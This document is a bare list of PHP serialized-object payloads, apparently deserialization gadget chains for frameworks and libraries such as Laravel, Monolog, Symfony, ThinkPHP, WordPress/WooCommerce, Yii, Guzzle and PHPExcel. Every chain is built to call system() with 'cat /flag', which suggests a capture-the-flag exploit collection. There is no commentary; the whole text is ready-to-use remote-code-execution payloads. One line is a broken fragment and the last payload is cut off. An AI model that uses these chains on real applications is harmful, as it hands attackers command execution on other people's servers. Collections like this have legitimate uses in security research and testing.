O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:41:"League\CommonMark\Environment\Environment":2:{s:64:"League\CommonMark\Environment\EnvironmentextensionsInitialized";b:1;s:55:"League\CommonMark\Environment\EnvironmentlistenerData";O:38:"League\CommonMark\Util\PrioritizedList":1:{s:44:"League\CommonMark\Util\PrioritizedListlist";a:1:{i:0;a:1:{i:0;O:36:"League\CommonMark\Event\ListenerData":2:{s:43:"League\CommonMark\Event\ListenerDataevent";s:32:"\Illuminate\Broadcasting\Channel";s:46:"League\CommonMark\Event\ListenerDatalistener";O:54:"Illuminate\Support\Testing\Fakes\ChainedBatchTruthTest":1:{s:11:"*callback";s:6:"system";}}}}}}s:8:"*event";O:31:"Illuminate\Broadcasting\Channel":1:{s:4:"name";s:9:"cat /flag";}}
O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"*socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:2;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:9:"cat /flag";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:6:"socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:2;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:9:"cat /flag";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";O:35:"Monolog\Handler\NativeMailerHandler":7:{s:5:"*to";N;s:10:"*subject";N;s:10:"*headers";N;s:8:"*level";N;s:9:"*bubble";b:0;s:12:"*formatter";N;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:9:"cat /flag";s:5:"level";N;}}s:8:"*level";N;s:9:"*bubble";b:0;s:12:"*formatter";N;s:13:"*processors";N;}O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";O:35:"Monolog\Handler\NativeMailerHandler":7:{s:5:"*to";N;s:10:"*subject";N;s:10:"*headers";N;s:8:"*level";N;s:9:"*bubble";b:0;s:12:"*formatter";N;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:9:"cat /flag";s:5:"level";N;}}s:8:"*level";N;s:9:"*bubble";b:0;s:12:"*formatter";N;s:13:"*processors";N;}
O:37:"Monolog\Handler\FingersCrossedHandler":3:{s:16:"*passthruLevel";i:0;s:9:"*buffer";a:1:{s:4:"test";a:2:{i:0;s:9:"cat /flag";s:5:"level";N;}}s:10:"*handler";O:28:"Monolog\Handler\GroupHandler":1:{s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
O:37:"Monolog\Handler\FingersCrossedHandler":3:{s:16:"*passthruLevel";i:0;s:9:"*buffer";a:1:{s:4:"test";a:2:{i:0;s:9:"cat /flag";s:5:"level";N;}}s:10:"*handler";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";N;s:13:"*bufferSize";i:-1;s:9:"*buffer";N;s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
O:37:"Monolog\Handler\FingersCrossedHandler":4:{s:16:"*passthruLevel";i:0;s:10:"*handler";r:1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:9:"cat /flag";s:5:"level";i:0;}}s:13:"*processors";a:2:{i:0;s:3:"pos";i:1;s:6:"system";}}
O:28:"Monolog\Handler\GroupHandler":1:{s:11:"*handlers";a:1:{i:0;O:29:"Monolog\Handler\BufferHandler":6:{s:10:"*handler";r:3;s:13:"*bufferSize";i:1;s:14:"*bufferLimit";i:0;s:9:"*buffer";a:1:{i:0;O:17:"Monolog\LogRecord":2:{s:5:"level";E:19:"Monolog\Level:Debug";s:5:"mixed";s:9:"cat /flag";}}s:14:"*initialized";b:1;s:13:"*processors";a:3:{i:0;s:15:"get_object_vars";i:1;s:3:"end";i:2;s:6:"system";}}}}
O:37:"Monolog\Handler\FingersCrossedHandler":4:{s:16:"*passthruLevel";E:19:"Monolog\Level:Debug";s:10:"*handler";r:1;s:9:"*buffer";a:1:{i:0;O:17:"Monolog\LogRecord":2:{s:5:"level";r:2;s:5:"mixed";s:9:"cat /flag";}}s:13:"*processors";a:3:{i:0;s:15:"get_object_vars";i:1;s:3:"end";i:2;s:6:"system";}}
O:33:"Opencart\System\Library\DB\mysqli":1:{s:45:"Opencart\System\Library\DB\mysqliconnection";O:31:"Opencart\System\Library\Session":2:{s:10:"*adaptor";O:28:"Opencart\System\Engine\Proxy":1:{s:7:"*data";a:1:{s:5:"write";s:6:"system";}}s:13:"*session_id";s:9:"cat /flag";}}
O:30:"GuzzleHttp\Handler\CurlFactory":1:{s:39:"GuzzleHttp\Handler\CurlFactoryhandles";O:19:"Aws\ResultPaginator":4:{s:27:"Aws\ResultPaginatorclient";O:28:"Opencart\System\Engine\Proxy":1:{s:7:"*data";a:2:{s:10:"getCommand";s:6:"system";s:7:"execute";s:7:"print_r";}}s:27:"Aws\ResultPaginatorconfig";a:1:{s:12:"output_token";b:0;}s:30:"Aws\ResultPaginatoroperation";s:9:"cat /flag";s:25:"Aws\ResultPaginatorargs";a:0:{}}}
O:31:"League\Plates\Template\Template":2:{s:7:"*name";s:9:"cat /flag";s:9:"*engine";O:31:"League\Plates\Template\Template":2:{s:7:"*name";N;s:9:"*engine";O:20:"League\Plates\Engine":1:{s:12:"*functions";O:32:"League\Plates\Template\Functions":1:{s:12:"*functions";a:1:{s:22:"getResolveTemplatePath";O:27:"League\Plates\Template\Func":2:{s:11:"*callback";a:2:{i:0;r:8;i:1;s:7:"getName";}s:7:"*name";s:6:"system";}}}}}}
O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"GuzzleHttp\Psr7\FnStreammethods";a:1:{s:10:"__toString";a:2:{i:0;O:39:"Pydio\Core\Controller\ShutdownScheduler":1:{s:50:"Pydio\Core\Controller\ShutdownSchedulercallbacks";a:1:{i:0;a:2:{i:0;s:6:"system";i:1;s:9:"cat /flag";}}}i:1;s:22:"callRegisteredShutdown";}}s:14:"_fn___toString";a:2:{i:0;O:39:"Pydio\Core\Controller\ShutdownScheduler":1:{s:50:"Pydio\Core\Controller\ShutdownSchedulercallbacks";a:1:{i:0;a:2:{i:0;s:6:"system";i:1;s:9:"cat /flag";}}}i:1;s:22:"callRegisteredShutdown";}}
O:18:"Slim\Http\Response":2:{s:10:"*headers";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"Slim\Container":3:{s:21:"Pimple\Containerraw";a:1:{s:3:"all";a:2:{i:0;O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"Slim\Container":3:{s:21:"Pimple\Containerraw";a:1:{s:3:"has";s:6:"system";}s:24:"Pimple\Containervalues";a:1:{s:3:"has";s:6:"system";}s:22:"Pimple\Containerkeys";a:1:{s:3:"has";s:6:"system";}}}}i:1;s:9:"cat /flag";}}s:24:"Pimple\Containervalues";a:1:{s:3:"all";a:2:{i:0;O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"Slim\Container":3:{s:21:"Pimple\Containerraw";a:1:{s:3:"has";s:6:"system";}s:24:"Pimple\Containervalues";a:1:{s:3:"has";s:6:"system";}s:22:"Pimple\Containerkeys";a:1:{s:3:"has";s:6:"system";}}}}i:1;s:9:"cat /flag";}}s:22:"Pimple\Containerkeys";a:1:{s:3:"all";a:2:{i:0;O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"Slim\Container":3:{s:21:"Pimple\Containerraw";a:1:{s:3:"has";s:6:"system";}s:24:"Pimple\Containervalues";a:1:{s:3:"has";s:6:"system";}s:22:"Pimple\Containerkeys";a:1:{s:3:"has";s:6:"system";}}}}i:1;s:9:"cat /flag";}}}}s:7:"*body";s:0:"";}
O:35:"Monolog\Handler\RotatingFileHandler":4:{s:13:"*mustRotate";b:1;s:11:"*filename";s:8:"anything";s:17:"*filenameFormat";O:30:"Spiral\Reactor\FileDeclaration":1:{s:42:"Spiral\Reactor\FileDeclarationdocComment";O:20:"PhpOption\LazyOption":2:{s:30:"PhpOption\LazyOptioncallback";s:6:"system";s:31:"PhpOption\LazyOptionarguments";a:1:{i:0;s:9:"cat /flag";}}}s:13:"*dateFormat";s:1:"l";}
O:7:"App\App":1:{s:12:"*finalizer";O:21:"Spiral\Boot\Finalizer":1:{s:33:"Spiral\Boot\Finalizerfinalizers";a:1:{i:0;a:2:{i:0;O:20:"PhpOption\LazyOption":2:{s:30:"PhpOption\LazyOptioncallback";s:6:"system";s:31:"PhpOption\LazyOptionarguments";a:1:{i:0;s:9:"cat /flag";}}i:1;s:3:"get";}}}}
O:47:"Symfony\Component\Cache\Adapter\TagAwareAdapter":2:{s:57:"Symfony\Component\Cache\Adapter\TagAwareAdapterdeferred";a:1:{i:0;O:33:"Symfony\Component\Cache\CacheItem":2:{s:11:"*poolHash";i:1;s:12:"*innerItem";s:9:"cat /flag";}}s:53:"Symfony\Component\Cache\Adapter\TagAwareAdapterpool";O:44:"Symfony\Component\Cache\Adapter\ProxyAdapter":2:{s:54:"Symfony\Component\Cache\Adapter\ProxyAdapterpoolHash";i:1;s:58:"Symfony\Component\Cache\Adapter\ProxyAdaptersetInnerItem";s:6:"system";}}
O:60:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollector":7:{s:7:"*data";a:3:{i:0;a:4:{s:4:"data";s:1:"1";s:4:"name";O:40:"Symfony\Component\Form\FormErrorIterator":2:{s:4:"form";N;s:48:"Symfony\Component\Form\FormErrorIteratorerrors";a:1:{i:0;O:40:"Symfony\Component\Form\FormErrorIterator":2:{s:4:"form";O:41:"Symfony\Component\Cache\Traits\RedisProxy":2:{s:48:"Symfony\Component\Cache\Traits\RedisProxyredis";s:9:"cat /flag";s:54:"Symfony\Component\Cache\Traits\RedisProxyinitializer";O:39:"Symfony\Component\Console\Helper\Dumper":1:{s:48:"Symfony\Component\Console\Helper\Dumperhandler";a:2:{i:0;O:44:"Symfony\Component\Cache\Adapter\ProxyAdapter":3:{s:61:"Symfony\Component\Cache\Adapter\ProxyAdaptercreateCacheItem";s:2:"dd";s:55:"Symfony\Component\Cache\Adapter\ProxyAdapternamespace";s:0:"";s:50:"Symfony\Component\Cache\Adapter\ProxyAdapterpool";O:43:"Symfony\Component\Cache\Adapter\NullAdapter":1:{s:60:"Symfony\Component\Cache\Adapter\NullAdaptercreateCacheItem";s:6:"system";}}i:1;s:7:"getItem";}}}s:48:"Symfony\Component\Form\FormErrorIteratorerrors";a:0:{}}}}s:4:"file";s:1:"3";s:4:"line";s:1:"4";}i:1;N;i:2;N;}s:71:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorstopwatch";N;s:76:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorfileLinkFormat";N;s:71:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectordataCount";i:0;s:73:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorisCollected";b:0;s:73:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorclonesCount";i:0;s:73:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorclonesIndex";i:0;}
O:47:"Symfony\Component\Cache\Adapter\TagAwareAdapter":2:{s:57:"Symfony\Component\Cache\Adapter\TagAwareAdapterdeferred";s:9:"cat /flag";s:61:"Symfony\Component\Cache\Adapter\TagAwareAdaptergetTagsByKey";s:6:"system";}
O:75:"Symfony\Component\DependencyInjection\Loader\Configurator\AliasConfigurator":1:{s:98:"Symfony\Component\DependencyInjection\Loader\Configurator\AbstractServiceConfiguratordefaultTags";O:66:"Symfony\Component\DependencyInjection\Argument\RewindableGenerator":1:{s:77:"Symfony\Component\DependencyInjection\Argument\RewindableGeneratorgenerator";a:2:{i:0;O:32:"Symfony\Component\Routing\Router":4:{s:10:"*matcher";N;s:10:"*context";a:1:{i:0;s:6:"system";}s:13:"*collection";O:13:"ArrayIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:0:{}i:3;N;}s:10:"*options";a:2:{s:13:"matcher_class";s:55:"\Symfony\Component\Finder\Iterator\CustomFilterIterator";s:9:"cache_dir";N;}}i:1;s:10:"getMatcher";}}}
O:44:"Symfony\Component\Process\Pipes\WindowsPipes":1:{s:57:"Symfony\Component\Process\Pipes\WindowsPipesfileHandles";O:50:"Symfony\Component\Finder\Iterator\SortableIterator":2:{s:60:"Symfony\Component\Finder\Iterator\SortableIteratoriterator";O:11:"ArrayObject":4:{i:0;i:0;i:1;a:2:{i:0;s:6:"system";i:1;s:9:"cat /flag";}i:2;a:0:{}i:3;N;}s:56:"Symfony\Component\Finder\Iterator\SortableIteratorsort";s:14:"call_user_func";}}
O:37:"Symfony\Component\BrowserKit\Response":1:{s:46:"Symfony\Component\BrowserKit\Responseheaders";O:50:"Symfony\Component\Finder\Iterator\SortableIterator":2:{s:60:"Symfony\Component\Finder\Iterator\SortableIteratoriterator";O:11:"ArrayObject":4:{i:0;i:0;i:1;a:2:{i:0;s:6:"system";i:1;s:9:"cat /flag";}i:2;a:0:{}i:3;N;}s:56:"Symfony\Component\Finder\Iterator\SortableIteratorsort";s:14:"call_user_func";}}
C:67:"Symfony\Component\Security\Core\Authentication\Token\AnonymousToken":543:{a:2:{i:0;N;i:1;O:51:"Symfony\Component\Validator\ConstraintViolationList":1:{s:63:"Symfony\Component\Validator\ConstraintViolationListviolations";O:50:"Symfony\Component\Finder\Iterator\SortableIterator":2:{s:60:"Symfony\Component\Finder\Iterator\SortableIteratoriterator";O:51:"Symfony\Component\Validator\ConstraintViolationList":1:{s:63:"Symfony\Component\Validator\ConstraintViolationListviolations";a:2:{i:0;s:6:"system";i:1;s:9:"cat /flag";}}s:56:"Symfony\Component\Finder\Iterator\SortableIteratorsort";s:14:"call_user_func";}}}}
O:27:"Swift_KeyCache_DiskKeyCache":2:{s:34:"Swift_KeyCache_DiskKeyCache_path";s:25:"thispathshouldneverexists";s:34:"Swift_KeyCache_DiskKeyCache_keys";O:29:"sfOutputEscaperArrayDecorator":2:{s:8:"*value";a:1:{i:1;s:9:"cat /flag";}s:17:"*escapingMethod";s:6:"system";}}
C:15:"sfDoctrinePager":120:{O:29:"sfOutputEscaperArrayDecorator":2:{s:8:"*value";a:1:{i:0;s:9:"cat /flag";}s:17:"*escapingMethod";s:6:"system";}}
O:14:"PropelDateTime":5:{s:4:"date";s:26:"2025-05-12 11:36:16.056743";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";s:26:"PropelDateTimedateString";N;s:24:"PropelDateTimetzString";O:30:"sfOutputEscaperObjectDecorator":2:{s:8:"*value";O:13:"sfCultureInfo":8:{s:14:"*dataFileExt";s:4:".dat";s:7:"*data";a:0:{}s:10:"*culture";s:9:"cat /flag";s:10:"*dataDir";N;s:12:"*dataFiles";a:0:{}s:17:"*dateTimeFormat";N;s:15:"*numberFormat";N;s:13:"*properties";a:0:{}}s:17:"*escapingMethod";s:6:"system";}}
O:15:"MySQLiTableInfo":15:{s:7:"*name";N;s:10:"*columns";O:29:"sfOutputEscaperArrayDecorator":2:{s:8:"*value";a:1:{i:0;s:9:"cat /flag";}s:17:"*escapingMethod";s:6:"system";}s:14:"*foreignKeys";a:0:{}s:10:"*indexes";a:0:{}s:13:"*primaryKey";N;s:11:"*pkLoaded";b:0;s:12:"*fksLoaded";b:0;s:16:"*indexesLoaded";b:0;s:13:"*colsLoaded";b:0;s:15:"*vendorLoaded";b:0;s:21:"*vendorSpecificInfo";a:0:{}s:7:"*conn";N;s:11:"*database";N;s:9:"*dblink";N;s:9:"*dbname";N;}
C:27:"sfNamespacedParameterHolder":120:{O:29:"sfOutputEscaperArrayDecorator":2:{s:8:"*value";a:1:{i:0;s:9:"cat /flag";}s:17:"*escapingMethod";s:6:"system";}}
O:27:"think\process\pipes\Windows":1:{s:34:"think\process\pipes\Windowsfiles";a:1:{i:0;O:17:"think\model\Pivot":3:{s:17:"think\Modeldata";a:1:{s:5:"smi1e";s:9:"cat /flag";}s:21:"think\ModelwithAttr";a:1:{s:5:"smi1e";s:6:"system";}s:9:"*append";a:1:{s:5:"smi1e";s:1:"1";}}}}
O:27:"think\process\pipes\Windows":1:{s:34:"think\process\pipes\Windowsfiles";a:1:{i:0;O:17:"think\model\Pivot":5:{s:9:"*append";a:1:{i:0;s:8:"getError";}s:8:"*error";O:27:"think\model\relation\HasOne":3:{s:15:"*selfRelation";b:0;s:8:"*query";O:14:"think\db\Query":1:{s:8:"*model";O:20:"think\console\Output":2:{s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached":2:{s:10:"*handler";O:27:"think\cache\driver\Memcache":3:{s:10:"*options";a:5:{s:6:"expire";i:0;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"path";s:0:"";s:13:"data_compress";b:0;}s:10:"*handler";O:13:"think\Request":2:{s:6:"*get";a:1:{s:18:"HEXENS<getAttr>no<";s:9:"cat /flag";}s:9:"*filter";s:6:"system";}s:6:"*tag";b:1;}s:9:"*config";a:7:{s:4:"host";s:9:"127.0.0.1";s:4:"port";i:11211;s:6:"expire";i:3600;s:7:"timeout";i:0;s:12:"session_name";s:6:"HEXENS";s:8:"username";s:0:"";s:8:"password";s:0:"";}}s:9:"*styles";a:1:{i:0;s:7:"getAttr";}}}s:11:"*bindAttr";a:2:{i:0;s:2:"no";i:1;s:3:"123";}}s:9:"*parent";O:20:"think\console\Output":2:{s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached":2:{s:10:"*handler";O:27:"think\cache\driver\Memcache":3:{s:10:"*options";a:5:{s:6:"expire";i:0;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"path";s:0:"";s:13:"data_compress";b:0;}s:10:"*handler";O:13:"think\Request":2:{s:6:"*get";a:1:{s:18:"HEXENS<getAttr>no<";s:9:"cat /flag";}s:9:"*filter";s:6:"system";}s:6:"*tag";b:1;}s:9:"*config";a:7:{s:4:"host";s:9:"127.0.0.1";s:4:"port";i:11211;s:6:"expire";i:3600;s:7:"timeout";i:0;s:12:"session_name";s:6:"HEXENS";s:8:"username";s:0:"";s:8:"password";s:0:"";}}s:9:"*styles";a:1:{i:0;s:7:"getAttr";}}s:15:"*selfRelation";b:0;s:8:"*query";O:14:"think\db\Query":1:{s:8:"*model";O:20:"think\console\Output":2:{s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached":2:{s:10:"*handler";O:27:"think\cache\driver\Memcache":3:{s:10:"*options";a:5:{s:6:"expire";i:0;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"path";s:0:"";s:13:"data_compress";b:0;}s:10:"*handler";O:13:"think\Request":2:{s:6:"*get";a:1:{s:18:"HEXENS<getAttr>no<";s:9:"cat /flag";}s:9:"*filter";s:6:"system";}s:6:"*tag";b:1;}s:9:"*config";a:7:{s:4:"host";s:9:"127.0.0.1";s:4:"port";i:11211;s:6:"expire";i:3600;s:7:"timeout";i:0;s:12:"session_name";s:6:"HEXENS";s:8:"username";s:0:"";s:8:"password";s:0:"";}}s:9:"*styles";a:1:{i:0;s:7:"getAttr";}}}}}}
O:41:"League\Flysystem\Cached\Storage\Psr6Cache":3:{s:47:"League\Flysystem\Cached\Storage\Psr6Cachepool";O:26:"League\Flysystem\Directory":2:{s:13:"*filesystem";O:26:"League\Flysystem\Directory":2:{s:13:"*filesystem";O:14:"think\Validate":1:{s:7:"*type";a:1:{s:3:"key";s:6:"system";}}s:7:"*path";s:9:"cat /flag";}s:7:"*path";s:3:"key";}s:11:"*autosave";b:0;s:6:"*key";a:1:{i:0;s:8:"anything";}}
O:17:"think\model\Pivot":9:{s:19:"think\Modelexists";b:1;s:18:"think\Modelforce";b:1;s:21:"think\ModellazySave";b:1;s:9:"*suffix";O:17:"think\model\Pivot":9:{s:19:"think\Modelexists";N;s:18:"think\Modelforce";N;s:21:"think\ModellazySave";N;s:9:"*suffix";N;s:17:"think\Modeldata";a:1:{s:3:"key";a:1:{s:3:"key";s:9:"cat /flag";}}s:21:"think\ModelwithAttr";a:1:{s:3:"key";a:1:{s:3:"key";s:6:"system";}}s:7:"*json";a:1:{i:0;s:3:"key";}s:12:"*jsonAssoc";b:1;s:12:"*withEvent";N;}s:17:"think\Modeldata";a:1:{s:3:"key";a:1:{s:3:"key";s:9:"cat /flag";}}s:21:"think\ModelwithAttr";N;s:7:"*json";N;s:12:"*jsonAssoc";N;s:12:"*withEvent";b:0;}
a:2:{i:0;O:27:"googlelogin_vendor_autoload":0:{}i:1;O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"*socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:4;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:9:"cat /flag";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}}
O:19:"Dompdf\Adapter\CPDF":1:{s:15:"*_image_cache";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:19:"Dompdf\Adapter\CPDF":1:{s:33:"Dompdf\Adapter\CPDF_image_cache";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
:11:"*callback";s:6:"system";}i:3;N;}}
O:31:"GuzzleHttp\Cookie\FileCookieJar":1:{s:41:"GuzzleHttp\Cookie\FileCookieJarfilename";O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:33:"GuzzleHttp\Cookie\SetCookiedata";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:2:{s:4:"Name";s:9:"cat /flag";s:5:"Value";s:0:"";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}}
O:19:"IG_Log_Handler_File":1:{s:10:"*handles";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:20:"EVF_Log_Handler_File":1:{s:10:"*handles";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:19:"WC_Log_Handler_File":1:{s:10:"*handles";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:9:"WC_Logger":1:{s:19:"WC_Logger_handles";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}
O:17:"PHPExcel_RichText":1:{s:35:"PHPExcel_RichTextrichTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:17:"PHPExcel_RichText":1:{s:36:"PHPExcel_RichText_richTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:37:"PHPExcel_CachedObjectStorage_DiscISAM":2:{s:47:"PHPExcel_CachedObjectStorage_DiscISAMfileName";O:17:"PHPExcel_RichText":1:{s:35:"PHPExcel_RichTextrichTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}s:49:"PHPExcel_CachedObjectStorage_DiscISAMfileHandle";i:42;}
O:37:"PHPExcel_CachedObjectStorage_DiscISAM":2:{s:48:"PHPExcel_CachedObjectStorage_DiscISAM_fileName";O:17:"PHPExcel_RichText":1:{s:36:"PHPExcel_RichText_richTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}s:50:"PHPExcel_CachedObjectStorage_DiscISAM_fileHandle";i:42;}
O:25:"PHPExcel_Shared_XMLWriter":1:{s:39:"PHPExcel_Shared_XMLWritertempFileName";O:17:"PHPExcel_RichText":1:{s:35:"PHPExcel_RichTextrichTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}}
O:25:"PHPExcel_Shared_XMLWriter":1:{s:40:"PHPExcel_Shared_XMLWriter_tempFileName";O:17:"PHPExcel_RichText":1:{s:36:"PHPExcel_RichText_richTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:9:"cat /flag";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}}
O:8:"WP_Theme":2:{s:7:"headers";O:13:"WP_Block_List":2:{s:6:"blocks";a:1:{s:4:"Name";a:1:{s:9:"blockName";s:12:"Parent Theme";}}s:8:"registry";O:22:"WP_Block_Type_Registry":1:{s:22:"registered_block_types";O:8:"WP_Theme":2:{s:7:"headers";N;s:6:"parent";O:22:"WpOrg\Requests\Session":3:{s:3:"url";s:10:"http://p:0";s:7:"headers";a:1:{i:0;s:9:"cat /flag";}s:7:"options";a:1:{s:5:"hooks";O:20:"WpOrg\Requests\Hooks":1:{s:5:"hooks";a:1:{s:23:"requests.before_request";a:1:{i:0;a:1:{i:0;a:2:{i:0;O:20:"WpOrg\Requests\Hooks":1:{s:5:"hooks";a:1:{s:15:"http://p:0/Name";a:1:{i:0;a:1:{i:0;s:6:"system";}}}}i:1;s:8:"dispatch";}}}}}}}}}}s:6:"parent";N;}
O:13:"WP_HTML_Token":2:{s:13:"bookmark_name";s:9:"cat /flag";s:10:"on_destroy";s:6:"system";}
O:11:"CDbCriteria":1:{s:6:"params";O:12:"CMapIterator":3:{s:16:"CMapIterator_d";O:10:"CFileCache":7:{s:9:"keyPrefix";s:0:"";s:7:"hashKey";b:0;s:10:"serializer";a:1:{i:1;s:6:"system";}s:9:"cachePath";s:10:"data:text/";s:14:"directoryLevel";i:0;s:11:"embedExpiry";b:1;s:15:"cacheFileSuffix";s:36:";base64,OTk5OTk5OTk5OWNhdCAvZmxhZw==";}s:19:"CMapIterator_keys";a:1:{i:0;i:0;}s:18:"CMapIterator_key";i:0;}}
O:15:"WikiPublishTask":1:{s:28:"WikiPublishTaskcookiesFile";O:39:"Prophecy\Argument\Token\ExactValueToken":2:{s:45:"Prophecy\Argument\Token\ExactValueTokenutil";O:44:"PHPUnit_Extensions_Selenium2TestCase_Session":3:{s:11:"*commands";a:1:{s:9:"stringify";s:6:"system";}s:6:"*url";O:40:"PHPUnit_Extensions_Selenium2TestCase_URL":0:{}s:9:"*driver";O:23:"DocBlox_Parallel_Worker":0:{}}s:46:"Prophecy\Argument\Token\ExactValueTokenvalue";s:9:"cat /flag";}}
O:23:"yii\db\BatchQueryResult":1:{s:36:"yii\db\BatchQueryResult_dataReader";O:17:"yii\db\Connection":2:{s:3:"pdo";i:1;s:3:"dsn";O:26:"yii\db\ColumnSchemaBuilder":2:{s:7:"*type";s:1:"x";s:11:"categoryMap";O:22:"yii\caching\ArrayCache":2:{s:10:"serializer";a:1:{i:1;s:6:"system";}s:30:"yii\caching\ArrayCache_cache";a:1:{s:1:"x";a:2:{i:0;s:9:"cat /flag";i:1;i:0;}}}}}}
O:17:"Zend_Form_Element":31:{s:8:"*_name";s:6:"system";s:14:"*_decorators";a:1:{i:0;O:24:"Zend_Form_Decorator_Form":5:{s:13:"*_placement";s:6:"APPEND";s:11:"*_element";N;s:11:"*_options";a:0:{}s:13:"*_separator";s:1:"
